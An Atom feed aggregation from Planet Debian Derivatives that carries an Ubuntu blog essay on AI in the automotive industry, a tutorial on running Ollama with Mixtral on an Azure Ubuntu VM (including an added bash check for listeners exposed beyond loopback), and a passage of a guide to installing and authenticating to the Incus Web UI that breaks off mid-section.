Planet Debian Derivatives
https://planet.debian.org/deriv/atom.xml
2024-03-29T11:46:36+00:00
http://intertwingly.net/code/venus/
Ubuntu Blog: AI and automotive: navigating the roads of tomorrow
https://ubuntu.com//blog/ai-and-automotive-navigating-the-roads-of-tomorrow
2024-03-29T08:00:00+00:00
<p>I had the pleasure of being invited by Canonical’s AI/ML Product Manager, Andreea Munteanu, to one of the recent episodes of the Canonical AI/ML podcast. As an enthusiast of automotive and technology with a background in software, I was very eager to share my insights into the influence of artificial intelligence (AI) in the automotive industry. I have a strong belief that the intersection of AI and cars represents a pivotal point where innovation meets practical implementation, and leads to safer, more efficient and more user-friendly cars.</p>
<p>In the episode, several key issues in the use of AI in cars and automotive in general came up. It’s not just the use of AI that we should be thinking about, but a whole range of safety, ethics, and privacy concerns that can eclipse simple technical challenges. This underscores the importance of considering the broader societal impacts and ethical implications of integrating AI into automotive technologies.</p>
<p>This blog explores the key takeaways from the engaging conversation we’ve had, diving into the present and future implications of AI in the world of automobiles. We talked about a lot in the half-hour discussion, but a stand-out moment for me was when we spoke about the impact AI implementation has on costs. I’ll get more into why I thought this was the most important part of our discussion in a bit, but for now you can listen to the entire conversation yourself in the <a href="https://open.spotify.com/episode/19y7OK5j8rCek3pP9BXkQN?si=d0cd185d08f1493c">podcast episode</a>.</p>
<h1 class="wp-block-heading">AI is everywhere in automotive</h1>
<p>AI is already embedded in every aspect of the automotive sector. This key role is not just limited to autonomous vehicles: AI is integral to manufacturing processes, predictive maintenance, and supply chain management. At almost every stage – whether it’s conceptualising and building cars, driving them, or monitoring their performance throughout their lifecycle – AI is critical.</p>
<h2 class="wp-block-heading">Safety considerations</h2>
<p>Cars driving themselves around makes people very nervous, especially when algorithms are tasked with making intricate split-second decisions that boil down to “don’t swerve into oncoming traffic”. It’s no surprise that safety is the paramount factor in vehicle AI conversations. Therefore, it is imperative to address the safety concerns associated with the integration of AI in automotive technology.</p>
<p><em>“Would you protect the driver and the vehicle occupants versus all the surrounding pedestrians? In some cases, the vehicle will have to choose”*</em><br /><a href="mailto:bertrand.boisseau@canonical.com"><em>Bertrand Boisseau</em></a></p>
<p>It’s a troubling ethical concern: do machines have a right to make decisions about human life, and what are the limits to that decision-making process? AI and autonomous vehicle engineers have their work cut out for them, as these decisions are incredibly complex and happen at the speed of life. When a glitch happens on your desktop, it’s not so bad because you’re not travelling at 100 km/hr through 2-lane traffic with oncoming trucks and pedestrians on every side.</p>
<p>While these challenges are significant and lead to a lot of uncertainty about whether it is safe to let Autonomous Driving (AD) vehicles drive around at the maximum speed limit, we should pause for a second to reflect on the extreme and ongoing testing and retesting that they undergo. </p>
<p>Driverless cars often make headlines when accidents happen. But it’s important to remember that accidents are part of driving, whether it’s with a human or autonomous tech. In reality, driving carries risks, and you’re likely to get in a car accident in your lifetime. So, while one accident might spark concerns, it’s crucial to see it in the bigger picture of transportation safety. </p>
<p>Also, a study comparing human ride-hail drivers and self-driving cars in San Francisco revealed that human drivers are more likely to crash, cause crashes, and injure others than autonomous vehicles. <a href="https://www.warpnews.org/transportation/self-driving-cars-are-safer-than-human-drivers-study-shows/">Human drivers had a crash rate of 50.5 crashes per million miles, while self-driving cars had a lower rate of 23 crashes per million miles</a>.</p>
<p>Additionally, the development of robust fail-safe mechanisms and redundant systems can serve as safeguards against potential algorithmic errors or malfunctions. Furthermore, ongoing collaboration between industry stakeholders, regulatory bodies, and research institutions fosters the establishment of comprehensive safety standards and guidelines for the integration of AI in automotive technology. </p>
<p>By prioritising safety considerations and adopting a multi-faceted approach encompassing technological innovation, rigorous testing, and regulatory oversight, the automotive industry can effectively address the safety challenges associated with AI integration, paving the way for safer and more reliable autonomous driving systems.</p>
<h2 class="wp-block-heading">Diverse applications beyond driving</h2>
<p>While self-driving cars often take centre stage, AI solves a broader spectrum of problems for the automotive industry: optimising manufacturing processes; predictive maintenance for parts replacement; and enhancing supply chain management efficiency, to name a few. It will also transform the in-car experience with advanced voice recognition and personalised assistance.</p>
<p><em>“I do believe that having advanced personal assistant will be noticeable for the user. Once you start putting voice recognition in there, it can become, I think, very useful.”*</em><br /><a href="mailto:bertrand.boisseau@canonical.com"><em>Bertrand Boisseau</em></a></p>
<h1 class="wp-block-heading">Challenges and concerns</h1>
<p>On the podcast, we mention that safety is the most obvious concern when it comes to the use of AI in cars, but there are even greater challenges and concerns that developers and automotive industry figures should be thinking about. These include privacy issues, the role of regulation in the use of AI, public trust in AI systems, job displacement fears, and the substantial costs associated with running AI/ML models, both in terms of processing power and energy consumption.</p>
<p><em>“You want to make sure that whatever is sent to the training models still complies with data privacy concerns: how do you collect data, how do you share vehicle data -which is usually private data-, how do you train these models?”*</em><br /><a href="mailto:bertrand.boisseau@canonical.com"><em>Bertrand Boisseau</em></a></p>
<p>When it comes to training machine learning models for autonomous vehicles, maintaining data privacy is crucial. We need to be mindful of how we collect and share vehicle data, ensuring it aligns with privacy concerns. It’s vital to gather data ethically and responsibly, while also validating its quality to prevent biases and inaccuracies. After all, if we feed the models with flawed data (from bad drivers, for example), we risk compromising their performance and safety. So, robust data validation processes are essential to ensure the effectiveness and reliability of autonomous vehicle technology.</p>
<h2 class="wp-block-heading">The evolution of jobs</h2>
<p>As AI evolves, so too does the nature of jobs in the automotive industry. Take developers as an example: as AI gains a stronger foothold in automotive development, our roles will transform from manually coding algorithms to focusing on simulating and validating AI models.</p>
<p><em>“I don’t agree with the idea of having job displacement in any way, but I do think that there is going to be a shift [in] the market, and there is a clear skill gap or understanding gap.”*</em><br /><a href="mailto:andreea.munteanu@canonical.com">Andreea Munteanu</a></p>
<p>The industry faces a growing need for individuals with expertise in both AI and automotive engineering, bridging the gap between technology and traditional automotive skills.</p>
<p>However, it’s also crucial to acknowledge the widespread concerns about the potential impact of autonomous vehicles on various job sectors within transportation, including taxi drivers, delivery drivers, truck drivers, valets, and e-hailing service contractors. While autonomous technology is advancing rapidly, broad legislation still typically mandates the presence of a human driver to take over the wheel if necessary, meaning fully human-free cars aren’t imminent.</p>
<h2 class="wp-block-heading">The use of open source</h2>
<p>Open source software will play a key role in the automotive sector. Open source software presents indispensable advantages such as unparalleled transparency, enabling thorough inspection and auditability of the codebase. </p>
<p>“Open source software in general and even [especially] in AI/ML would be the wiser choice in most cases.”*<br /><a href="mailto:bertrand.boisseau@canonical.com">Bertrand Boisseau</a></p>
<p>This transparency not only fosters trust and reliability but also empowers developers to identify and rectify potential issues swiftly, ensuring the highest standards of quality and security. Additionally, going with closed source might mean that Original Equipment Manufacturers (OEMs), or even the customers, have to pay extra fees per year just for licences. Imagine having a “smarter” car that becomes useless if a licence lapses or expires. Open source cuts down on these costs since you’re not constrained by licences, making software cheaper to create, keep up, and expand. Fewer closed source licences mean less complexity in the user experience.</p>
<p>The adoption of open-source models, tools, and frameworks is likely to grow, especially as companies aim to balance innovation and security.</p>
<h2 class="wp-block-heading">Data privacy</h2>
<p>As AI becomes increasingly integrated into the automotive industry, ensuring robust data privacy measures is paramount. The vast amounts of data generated by connected vehicles, ranging from driver behaviour to location information, raise significant privacy concerns. </p>
<p>It’s essential to implement strict and clear data protection protocols to safeguard sensitive information from unauthorised access or misuse. Additionally, transparent data collection practices and clear consent mechanisms must be established to ensure that users have control over their data. </p>
<p>Failure to address data privacy issues adequately not only risks violating privacy regulations but also erodes consumer trust, hindering widespread adoption of AI-driven automotive technologies. With the implementation of EU policies such as GDPR, fines can be as high as 10 million euros or up to 2% of the company’s entire global turnover of the preceding fiscal year (whichever is higher), further emphasising the importance of robust data privacy measures.</p>
<h2 class="wp-block-heading">AI can reduce costs in automotive</h2>
<p>Cost considerations are another crucial aspect of integrating AI into the automotive industry. While AI technologies hold immense potential to optimise operations, enhance safety, and improve the driving experience, they often come with significant upfront and ongoing costs. </p>
<p>The automotive industry is also fiercely focused on cost optimisation: cars that are more expensive are a severe risk for sales, especially in saturated markets. What good is AI and all the hardware and infrastructure it will need if it just leads to cars that their usual buyers can no longer afford? </p>
<p>Additionally, ensuring compatibility with existing systems and regulatory compliance may incur other expenses. Moreover, there are ongoing costs associated with maintaining and updating AI systems, as well as training personnel to effectively use and manage these technologies. </p>
<p>However, despite the initial investment, the potential long-term benefits, such as increased efficiency, reduced accidents, and improved customer satisfaction, can outweigh the costs over time. Therefore, while cost is a critical factor to consider, automotive companies must carefully weigh the upfront investment against the potential long-term returns and strategic advantages offered by AI integration.</p>
<h2 class="wp-block-heading">Regulations: the wild west won’t stay wild forever</h2>
<p><a href="https://ubuntu.com/blog/functional-safety-in-automotive-contributing-to-iso-26262-and-iso-21434-standards">Navigating regulatory frameworks</a> generally presents significant challenges. This is already true for the integration of AI into the automotive industry. Regulators are often slow to react to the rapid pace of technological advancements, resulting in a lag between the emergence of new AI-driven automotive technologies and the establishment of appropriate regulations. This delay can create uncertainty and hinder innovation within the industry as companies navigate ambiguous regulatory landscapes. </p>
<p>However, once regulatory wheels are set in motion, they can hit like a truck, with stringent requirements and compliance measures impacting the entire automotive ecosystem. The sudden imposition of regulations can disrupt ongoing projects, necessitate costly adjustments, and delay the deployment of AI technologies. </p>
<p>Therefore, automotive companies must remain vigilant and proactive in engaging with regulators, advocating for clear and forward-thinking regulatory frameworks that balance innovation with safety and compliance. By fostering collaboration and dialogue between industry stakeholders and regulators, the automotive industry can navigate regulatory challenges more effectively and ensure the responsible and sustainable integration of AI technologies.</p>
<h2 class="wp-block-heading">Reconciling AI and sustainability</h2>
<p>Sustainability and energy consumption are crucial topics of debate in the automotive industry, especially concerning the integration of AI technologies. Data centres, which are essential for processing the vast amounts of data generated by AI-driven systems, consume substantial amounts of energy. The energy usage of a single data centre can be equivalent to that of a small town, highlighting the significant environmental impact associated with AI infrastructure.</p>
<p><em>“If you need processing power, you need energy. The big [AI/ML] players have also been saying that we will need to build nuclear power plants to run all the requests.”*</em><br /><a href="mailto:bertrand.boisseau@canonical.com"><em>Bertrand Boisseau</em></a></p>
<p>Similarly, badly optimised, individual autonomous cars, with their sophisticated sensor systems and computational requirements, might also <a href="https://www.businessinsider.com/chatgpt-uses-17-thousand-times-more-electricity-than-us-household-2024-3?r=US&IR=T">consume considerable energy</a> during operation.</p>
<p>As the automotive industry embraces AI, it must address the sustainability implications of increased energy consumption and explore strategies to minimise environmental impact, such as optimising algorithms for efficiency, utilising renewable energy sources, and implementing energy-saving technologies.</p>
<h2 class="wp-block-heading">Addressing criticisms of automotive automation</h2>
<p>Automation in the automotive industry presents significant potential, yet it’s essential to address ongoing discussions surrounding the broader concept of automation, particularly in social media and consumer circles. Questions arise, challenging the value of autonomous driving and whether every aspect of a car’s operation needs to be automated. While these debates hold merit, they often overlook the broader implications and benefits that automation can bring.</p>
<p>Arguments against automation often highlight concerns regarding the potential loss of manual driving skills and the ability to react to unforeseen situations beyond the scope of automated systems. However, it’s crucial to consider that historical transitions in automotive technology, such as the shift from manual to automatic transmission or the adoption of adaptive cruise control, have not resulted in increased accidents — quite the opposite, in fact. On top of that, the advancement of automation extends beyond driverless vehicles alone, encompassing a multitude of frameworks, optimisations, and breakthroughs with far-reaching impacts.</p>
<p>Drawing parallels to other technological achievements, such as the space program, sheds light on the extensive benefits that arise from ambitious projects despite initial scepticism. Much like criticisms were raised against space exploration, which questioned its necessity or deemed it a misallocation of resources, the collective efforts in the automotive industry toward automation yield a number of innovations and enhancements. These advancements not only streamline operation and maintenance but also significantly enhance safety for drivers and road users alike. Therefore, while discussions surrounding automation provoke diverse perspectives, embracing its potential fosters progress and innovation within the automotive landscape, and beyond.</p>
<h1 class="wp-block-heading">The future of AI in automotive</h1>
<p>In the future, AI in the automotive industry will certainly be widespread; but the application of AI will dominate more specific use cases, such as autonomous driving systems, personal assistants or predictive maintenance. The reasons for this are quite simple: the data processing and warehousing for each automated vehicle become difficult to design and expensive to run, especially when the financial returns on AI products and their long-term financial sustainability are still unproven. There are still strong challenges when it comes to generating revenue from AI investments, particularly in the automotive realm, where return on investment and sustainable business models are still evolving.</p>
<p>I found our podcast conversation on AI in the automotive industry incredibly engaging, especially when we delved into the potential impact on safety and driving experiences. It’s fascinating to envision how AI will revolutionise not just the way we drive, but also how vehicles are manufactured and maintained. As AI paves the roads of tomorrow, the integration of AI into the automotive industry promises a transformative journey.</p>
<p>As a passionate car enthusiast, I think we’re headed towards a new era of innovation. AI will be in our cars, homes, jobs, buses, and perhaps even our law-making offices. As it grows and evolves, it’ll be even more important to keep track of its progression and adoption – which is why I’m glad that podcasts like ours exist. If you want to stay ahead of AI/ML and GenAI in the automotive industry – or indeed, any industry – and watch its interplay with open source applications, follow the <a href="https://open.spotify.com/show/0vXcVgTHKUeJZx5YYYgdiX">Ubuntu AI Podcasts by Canonical</a>.</p>
<p>*quotations edited for clarity and brevity</p>
<p><a href="https://open.spotify.com/episode/19y7OK5j8rCek3pP9BXkQN?si=d0cd185d08f1493c">Listen to the podcast episode</a></p>
<h2 class="wp-block-heading"><strong>Further reading</strong></h2>
<p><a href="https://ubuntu.com/engage/software-defined-vehicles-whitepaper?utm_medium=blog&utm_campaign=7014K000000UhzE">Want to learn more about Software Defined Vehicles? Download our guide!</a></p>
<p><a href="https://ubuntu.com/blog/elektrobit-and-canonical-announce-eb-corbos-linux-built-on-ubuntu">Learn about the next-generation automotive operating system: EB corbos Linux – built on Ubuntu</a></p>
<p><a href="https://ubuntu.com/blog/how-to-choose-an-os-for-software-development-in-automotive">How to choose an OS for software development in automotive</a></p>
Ubuntu developers
http://planet.ubuntu.com/
Ubuntu Blog: Deploying Open Language Models on Ubuntu
https://ubuntu.com//blog/deploying-open-language-models-on-ubuntu
2024-03-28T22:18:41+00:00
<p>This blog post explores the technical and strategic benefits of deploying open-source AI models on Ubuntu. We’ll highlight why it makes sense to use Ubuntu with open-source AI models, and outline the deployment process on Azure.</p>
<p><em>Authored by Gauthier Jolly, Software Engineer, CPC, and Jehudi Castro-Sierra, Public Cloud Alliance Director, both from Canonical.</em></p>
<h2 class="wp-block-heading">Why Ubuntu for Open-Source AI?</h2>
<ul>
<li><strong>Open Philosophy</strong>: Ubuntu’s open-source nature aligns seamlessly with the principles of open-source AI models, fostering collaboration and accessibility.</li>
<li><strong>Seamless Integration</strong>: Deploying open-source AI is smooth on Ubuntu, thanks to its robust support for AI libraries and tools.</li>
<li><strong>Community</strong>: Ubuntu’s large community provides valuable resources and knowledge-sharing for AI development.</li>
</ul>
<h2 class="wp-block-heading">The Role of Ubuntu Pro</h2>
<p>Ubuntu Pro elevates the security and compliance aspects of deploying AI models, offering extended security maintenance, comprehensive patching, and automated compliance features that are vital for enterprise-grade applications. Its integration with Confidential VMs on Azure enhances the protection of sensitive data and model integrity, making it an indispensable tool for tasks requiring stringent security measures like ML training, inference, and confidential multi-party data analytics.</p>
<h2 class="wp-block-heading">Why use the public cloud for deploying AI models?</h2>
<p>Using a public cloud like Azure gives straightforward access to powerful GPUs and <a href="https://ubuntu.com/blog/preview-confidential-ai-azure">Confidential Compute capabilities</a>, essential for intensive AI tasks. These features significantly reduce the time and complexity involved in setting up and running AI models, without compromising on security and privacy. Although some may opt for on-prem deployment due to specific requirements, Azure’s scalable and secure environment offers a compelling argument for cloud-based deployments.</p>
<h2 class="wp-block-heading">Provisioning and Configuration</h2>
<p>We are going to explore using open models on Azure by creating an instance with Ubuntu, installing NVIDIA drivers for GPU support, and setting up Ollama for running the models. The process is technical, involving CLI commands for creating the resource group, VM, and configuring NVIDIA drivers. Ollama, the chosen tool for running models like Mixtral, is best installed using Snap for a hassle-free experience, encapsulating dependencies and simplifying updates.</p>
<h3 class="wp-block-heading">Provision an Azure VM</h3>
<p>Begin by creating a resource group and then a VM with the Ubuntu image using the Azure CLI.</p>
<div class="wp-block-group is-layout-constrained wp-block-group-is-layout-constrained"><div class="wp-block-group__inner-container">
<pre class="wp-block-preformatted">az group create --location westus --resource-group ml-workload
az vm create \
--resource-group ml-workload \
--name jammy \
--image Ubuntu2204 \
--generate-ssh-keys \
--size Standard_NC4as_T4_v3 \
--admin-username ubuntu --license-type UBUNTU_PRO
</pre>
<p>Note the publicIpAddress from the output – you’ll need it to SSH into the VM.</p>
</div></div>
<h3 class="wp-block-heading">Install Nvidia Drivers (GPU Support)</h3>
<p>For GPU capabilities, install NVIDIA drivers using Ubuntu’s package management system. Restart the system after installation.</p>
<pre class="wp-block-preformatted">sudo apt update -y
sudo apt full-upgrade -y
sudo apt install -y ubuntu-drivers-common
sudo ubuntu-drivers install
sudo systemctl reboot</pre>
<p><strong>Important</strong>: Standard NVIDIA drivers don’t support vGPUs (fractional GPUs). See instructions on the <a href="https://learn.microsoft.com/en-us/azure/virtual-machines/linux/n-series-driver-setup#install-grid-drivers-on-nv-or-nvv3-series-vms">Azure site</a> for installing GRID drivers, which might involve building an unsigned kernel module (which may be incompatible with Secure Boot).</p>
<h3 class="wp-block-heading">Deploying Ollama with Snap</h3>
<p>Snap simplifies the installation of Ollama and its dependencies, ensuring compatibility and streamlined updates. The --beta flag allows you to access the latest features and versions, which might still be under development.</p>
<pre class="wp-block-preformatted">sudo snap install --beta ollama</pre>
<h3 class="wp-block-heading">Configuration</h3>
<p>Configure Ollama to use the ephemeral disk:</p>
<pre class="wp-block-preformatted">sudo mkdir /mnt/models
sudo snap connect ollama:removable-media # to allow the snap to reach /mnt
sudo snap set ollama models=/mnt/models</pre>
<h3 class="wp-block-heading">Installing Mixtral</h3>
<p>At this point, you can run one of the open models available out of the box, like mixtral or llama2. If you have a fine-tuned version of these models (a process that involves further training on a specific dataset), you can run those as well.</p>
<pre class="wp-block-preformatted">ollama run mixtral</pre>
<p>The first run might take a while to download the model.</p>
<p>Now you can use the model through the console interface:<br />
</p><div class="lazyload">
<noscript>
<img alt="" height="241" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_917,h_241/https://lh7-us.googleusercontent.com/hA8UbKlBIWYzwuHR9PlWYA8sg32PBmRar_lFi6zcAfqwXB1f2jApIQ-ty97JXJxVBDzz9opk0_hZB1bVMfzCQFXLBNyFUUy9BNjGGTZjlCAnBNilGUK67zPgXqBpFGM9J1zFu4pYARGBv74DUU2jCY4" width="917" />
</noscript>
</div>
<p></p>
<h3 class="wp-block-heading">Installing a UI</h3>
<p>This step is optional, but provides a UI via your web browser.</p>
<pre class="wp-block-preformatted">sudo snap install --beta open-webui</pre>
<h3 class="wp-block-heading">Access the web UI securely</h3>
<p>To quickly access the UI without opening ports in the Azure security group, you can create an SSH tunnel to your VM using the following command:</p>
<pre class="wp-block-preformatted">ssh -L 8080:localhost:8080 ubuntu@${IP_ADDR}</pre>
<p>Go to <a href="http://localhost:8080">http://localhost:8080</a> in your web browser on your local machine (the command above tunnels the traffic from your localhost to the instance on Azure).</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" height="333" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1098,h_333/https://ubuntu.com/wp-content/uploads/a48a/image.png" width="1098" />
</noscript>
</div>
</figure>
<p>In case you want to make this service public, follow this <a href="https://learn.microsoft.com/en-us/azure/virtual-network/application-security-groups">documentation</a>.</p>
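<p>One way to check that the SSH tunnel really is the only route to these services: the added example below (not part of the original post) parses <code>ss -H -ltn</code> output and lists audited listeners bound to a non-loopback address. Port 11434 (Ollama's default API port, assumed unchanged by the snap) and the sample lines are assumptions constructed for illustration.</p>

```shell
#!/usr/bin/env bash
# Added example (not from the original post): list audited TCP listeners that
# are bound to a non-loopback address, i.e. reachable without the SSH tunnel
# as soon as a network rule allows the port.
#
# Input format: lines as printed by `ss -H -ltn`
#   State  Recv-Q  Send-Q  Local-Address:Port  Peer-Address:Port

# 8080 is the web UI port tunnelled above. 11434 is Ollama's default API port
# (assumption: the snap keeps that default).
AUDIT_PORTS="8080 11434"

# Constructed sample: every audited port is bound to loopback only.
SAMPLE_SAFE='LISTEN 0 4096 127.0.0.1:11434 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:8080 0.0.0.0:*
LISTEN 0 128 [::]:22 [::]:*'

# Constructed sample: audited ports bound to wildcard addresses.
SAMPLE_EXPOSED='LISTEN 0 4096 127.0.0.1:11434 0.0.0.0:*
LISTEN 0 4096 0.0.0.0:8080 0.0.0.0:*
LISTEN 0 4096 [::]:11434 [::]:*
LISTEN 0 4096 [::1]:8080 [::]:*
LISTEN 0 4096 *:8080 *:*'

# Return 0 if the address part of a listener is a loopback address.
is_loopback() {
    local addr="${1%%%*}"     # drop a "%iface" suffix, e.g. 127.0.0.53%lo
    addr="${addr#\[}"         # drop IPv6 brackets
    addr="${addr%\]}"
    case "$addr" in
        127.*|::1|::ffff:127.*) return 0 ;;
        *) return 1 ;;
    esac
}

# Read ss lines on stdin; print each audited listener not bound to loopback.
exposed_listeners() {
    local state recvq sendq local_ep rest port addr p
    while read -r state recvq sendq local_ep rest; do
        [ "$state" = "LISTEN" ] || continue
        port="${local_ep##*:}"    # text after the last colon
        addr="${local_ep%:*}"     # everything before the last colon
        for p in $AUDIT_PORTS; do
            if [ "$port" = "$p" ] && ! is_loopback "$addr"; then
                printf '%s\n' "$local_ep"
            fi
        done
    done
}

# Demo on the constructed samples.
echo "safe sample:"
printf '%s\n' "$SAMPLE_SAFE" | exposed_listeners
echo "exposed sample:"
printf '%s\n' "$SAMPLE_EXPOSED" | exposed_listeners
```

<p>On the VM, feed it live data with <code>ss -H -ltn | exposed_listeners</code>; empty output means neither audited port is bound to an externally reachable address.</p>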
<h3 class="wp-block-heading">Verify GPU usage</h3>
<pre class="wp-block-preformatted">sudo watch -n2 nvidia-smi</pre>
<p>Check that the ollama process is using the GPU; you should see something like this:</p>
<pre class="wp-block-preformatted">+---------------------------------------------------------------------------+
| Processes: |
| GPU GI CI PID Type Process name GPU Memory |
| ID ID Usage |
|===========================================================================|
| 0 N/A N/A 1063 C /snap/ollama/13/bin/ollama 4882MiB |
+---------------------------------------------------------------------------+
</pre>
<h2 class="wp-block-heading">Complementary and Alternative Solutions</h2>
<ul>
<li><a href="https://charmed-kubeflow.io/">Charmed Kubeflow</a>: Explore this solution for end-to-end MLOps (Machine Learning Operations), providing a streamlined platform to manage every stage of the machine learning lifecycle. It’s particularly well-suited for complex or large-scale AI deployments.</li>
<li>Azure AI Studio: Provides ease of use for those seeking less customization.</li>
</ul>
<h2 class="wp-block-heading">Conclusion</h2>
<p>Ubuntu’s open-source foundation and robust ecosystem make it a compelling choice for deploying open-source AI models. When combined with Azure’s GPU capabilities and Confidential Compute features, you gain a flexible, secure, and performant AI solution.</p>
Ubuntu developers
http://planet.ubuntu.com/
Simos Xenitellis: How to install and setup the Incus Web UI
https://blog.simos.info/?p=46759
2024-03-28T22:16:39+00:00
<p><a href="https://linuxcontainers.org/incus/">Incus</a> is a manager for <strong><em>virtual machines (VM)</em></strong> and <strong><em>system containers</em></strong>. There is also <a href="https://discuss.linuxcontainers.org/">an Incus support forum</a>.</p>
<p>Typically you would use the <code>incus</code> command-line interface (CLI) client to get access to the Incus manager and perform the tasks for the full life-cycle of the virtual machines and system containers. </p>
<p>In this post we see how to install and set up the Incus Web UI. Just like the <code>incus</code> CLI tool that gets access to the REST API of the Incus manager (through a Unix socket or HTTPS), the Incus Web UI does the same over HTTPS. I assume that you have already installed and set up Incus.</p>
<h2 class="wp-block-heading" id="installing-the-incus-web-ui-package">Installing the Incus Web UI package</h2>
<p>The Incus Web UI package is <code>incus-ui-canonical</code>. We install it. By installing the package, we can enable Incus to serve the necessary Web pages (from <code>/opt/incus/ui</code>) so that we can connect with our browser and manage Incus itself. </p>
<pre class="wp-block-code"><code><kbd>sudo apt install -y incus-ui-canonical</kbd></code></pre>
<h2 class="wp-block-heading" id="preparing-incus-to-serve-the-web-ui">Preparing Incus to serve the Web UI</h2>
<p>By default Incus is not <em>listening</em> on a network port, so we cannot reach it directly from the browser. <a href="https://linuxcontainers.org/incus/docs/main/howto/server_expose/">We first need to expose Incus over the network.</a> On a fresh installation, <code>incus config show</code> shows an empty configuration.</p>
<pre class="wp-block-code"><code>debian@myincus:~$ <kbd>incus config show </kbd>
config: {}
debian@myincus:~$ </code></pre>
<p>We activate the Incus Web server, selecting the port number 8443. You are free to select another one, if you need to. We set <code>core.https_address</code> to <code>:8443</code>. This information appears in the <code>incus config</code> output.</p>
<pre class="wp-block-code"><code>debian@myincus:~$ <kbd>incus config set core.https_address :8443</kbd>
debian@myincus:~$ <kbd>incus config show </kbd>
config:
core.https_address: :8443
debian@myincus:~$ </code></pre>
<p>Let’s verify that Incus is now listening on port 8443. It is, and on all interfaces (because of the <code>*</code>).</p>
<pre class="wp-block-code"><code>debian@myincus:~$ <kbd>sudo apt install -y lsof</kbd>
...
debian@myincus:~$ <kbd>sudo lsof -i :8443</kbd>
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
incusd 8338 root 8u IPv6 29751 0t0 TCP *:8443 (LISTEN)
debian@myincus:~$ </code></pre>
<p>This is HTTPS, so where are the certificate and the server key (private key)?</p>
<pre class="wp-block-code"><code>debian@myincus:~$ <kbd>sudo ls -l /var/lib/incus/server.key /var/lib/incus/server.crt</kbd>
-rw-r--r-- 1 root root 753 Mar 28 18:54 /var/lib/incus/server.crt
-rw------- 1 root root 288 Mar 28 18:54 /var/lib/incus/server.key
debian@myincus:~$ <kbd>sudo openssl x509 -in /var/lib/incus/server.crt -text -noout</kbd>
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
22:05:f1:14:f2:82:43:68:44:5e:1c:42:4c:28:5b:5c
Signature Algorithm: ecdsa-with-SHA384
Issuer: O = Linux Containers, CN = root@myincus
Validity
Not Before: Mar 28 18:54:17 2024 GMT
Not After : Mar 26 18:54:17 2034 GMT
Subject: O = Linux Containers, CN = root@myincus
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (384 bit)
pub:
04:fb:cd:b6:b2:25:55:68:a5:33:75:48:4c:b0:7a:
2f:e9:c0:16:af:6f:b2:36:f9:19:6e:b0:86:bf:d1:
9f:07:16:b1:26:8b:75:36:f2:fc:02:38:c7:fa:25:
39:01:6c:bb:48:a9:4f:57:0d:af:e1:0f:a3:cf:b1:
7c:a2:d9:46:77:e7:94:c7:00:1a:d0:5f:5f:93:d8:
11:39:8d:16:0e:d0:62:98:81:93:da:ec:b8:70:24:
f2:c4:da:91:0f:f8:8e
ASN1 OID: secp384r1
NIST CURVE: P-384
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Alternative Name:
DNS:myincus, IP Address:127.0.0.1, IP Address:0:0:0:0:0:0:0:1
Signature Algorithm: ecdsa-with-SHA384
Signature Value:
30:64:02:30:15:f4:fa:7b:d6:52:79:d4:c9:27:b9:d6:6c:90:
f7:0e:13:83:15:ac:af:cd:c5:f2:48:08:99:7f:7b:94:55:06:
81:95:80:5f:0a:21:17:82:61:ac:5a:b6:5f:b8:49:b3:02:30:
62:a3:92:66:da:ce:7c:01:49:7e:38:16:c6:16:b3:cb:aa:3d:
1d:3f:63:12:93:e8:a1:0b:55:f0:80:99:d5:80:8a:a3:a6:2e:
3d:68:90:a6:dc:55:29:0b:36:80:36:72
debian@myincus:~$</code></pre>
<p>Note that this is a self-signed certificate. Chrome, Firefox and other browsers will complain; you can still accept and continue, but the browser will show a broken padlock in the address bar. If you wish, you can replace the server key and the server certificate with a properly issued pair so that the padlock is intact; once you have replaced them, restart Incus. If, however, you are running an Incus cluster, you must use <code>incus cluster update-certificate</code> instead to update them. Note that a common alternative to dealing with Incus certificates is to use a reverse proxy: the reverse proxy uses a proper certificate and Incus is left as is.</p>
<p>At this point Incus is configured. We can continue with the next step where we get the client (our browser) to be authenticated to the server. </p>
<h2 class="wp-block-heading" id="getting-the-browser-to-authenticate-to-the-server">Getting the browser to authenticate to the server</h2>
<p>Visit the URL of your Incus server with your browser. At first you will likely be confronted with a message that the server certificate is not accepted (<em>Warning: Potential Security Risk Ahead</em>). Click to <em>Accept</em> and continue. Then, you are presented with the following screen that asks you to log in. You are authenticated to the Incus server through <em>user certificates</em>, and you are prompted here to set one up. Your browser will create </p>
<ol>
<li>a user certificate to be installed into Incus (<code>incus-ui.crt</code>)</li>
<li>the same user certificate with a private key that will be set up in your browser(s) (<code>incus-ui.pfx</code>).</li>
</ol>
<p>Click on <strong><em>Create a new certificate</em></strong>.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-1.png?ssl=1"><img alt="" class="wp-image-46763" height="485" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-1.png?resize=750%2C485&ssl=1" width="750" /></a>Creating a new certificate.</figure></div>
<p>Now click on <strong><em>Generate</em></strong> to get your browser to generate the private key and the certificate. </p>
<figure class="wp-block-image size-large"><a href="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-2.png?ssl=1"><img alt="" class="wp-image-46766" height="641" src="https://i0.wp.com/blog.simos.info/wp-content/uploads/2024/03/image-2.png?resize=750%2C641&ssl=1" width="750" /></a></figure>
<p></p>
<p>You are asked whether you want to protect the certificate with a password. In our case we click on <strong><em>Skip</em></strong> because we do not want to encrypt the private key with a password. By clicking on <strong><em>Skip</em></strong>, the private key is still generated but it is stored unencrypted in <code>incus-ui.pfx</code>.</p>
<div class="wp-block-image">
